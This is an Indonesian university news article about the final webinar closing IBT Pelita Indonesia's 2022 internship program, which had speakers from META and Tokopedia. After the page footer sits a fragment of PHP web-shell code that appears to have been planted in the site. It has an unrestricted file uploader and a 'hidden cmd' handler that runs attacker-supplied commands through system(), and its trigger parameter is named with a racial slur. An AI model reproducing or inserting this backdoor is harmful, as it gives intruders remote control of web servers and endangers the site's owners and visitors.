#

Webinar Seri Terakhir Kegiatan PKL 2022

Kegiatan PKL Institut Bisnis dan Teknologi (IBT) Pelita Indonesia telah memasuki akhir masa pelaksanaannya. Setelah hampir berlangsung selama 3 bulan, akhirnya kegiatan PKL untuk tahun 2022 berakhir pada hari Selasa (31/05/2022). Penutupan kegiatan PKL ini ditandai dengan pelaksanaan webinar sesi terakhir yang dilakukan secara daring oleh sekretariat PKL. Webinar sesi terakhir ini mengusung tema Technopreneurship : Prospect & Challenge. Diangkatnya tema ini tidak terlepas dari salah satu skema kegiatan PKL pada tahun 2022 yang berbentuk business project, dengan mengkolaborasikan dua bidang keilmuan dari dua fakultas yang ada di IBT Pelita Indonesia, yaitu fakultas bisnis dan fakultas ilmu ekonomi. “Tujuan dilakukannya kolaborasi antara kedua bidang keilmuan ini adalah akan bermunculan para usahawan di bidang technopreneurship dari mahasiswa IBT Pelita Indonesia” ujar Prof. Dr, Teddy Chandra, SE., MM., di dalam sambutan beliau.

Webinar kali ini terasa spesial karena menghadirkan narasumber yang berasal dari perusahaan-perusahaan ternama di bidang teknologi, yaitu Kezia Gusmawan dari perusahaan META perwakilan Singapura, yang merupakan perusahaan induk dari Facebook, Instagram, Whatsapp, dan beberapa produk teknologi lainnya. Narasumber berikutnya adalah Ivander Wijaya yang merupakan perwakilan dari Tokopedia. Seperti yang sama-sama kita ketahui, Tokopedia merupakan salah satu e-commerce atau toko online terbesar di Indonesia. Adapun Total peserta dari webinar sesi terakhir ini berjumlah 415 partisipan yang merupakan seluruh mahasiswa yang mengikuti program PKL dan business project beserta dengan seluruh dosen IBT Pelita Indonesia yang menjadi pembimbing mereka.

Selain webinar, acara seremoni penutupan kegiatan PKL pada tahun 2022 kali ini juga dilaksanakan penandatanganan Perjanjian Kerja Sama (PKS) antara IBT Pelita Indonesia dengan Tokopedia untuk mendukung kegiatan business project di tahun-tahun yang akan datang. Sementara itu penutupan kegiatan PKL secara resmi langsung dilakukan oleh Rektor IBT Pelita Indonesia, yakni Bapak Prof. Dr. Amries Rusli Tanjung, MM.Ak.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>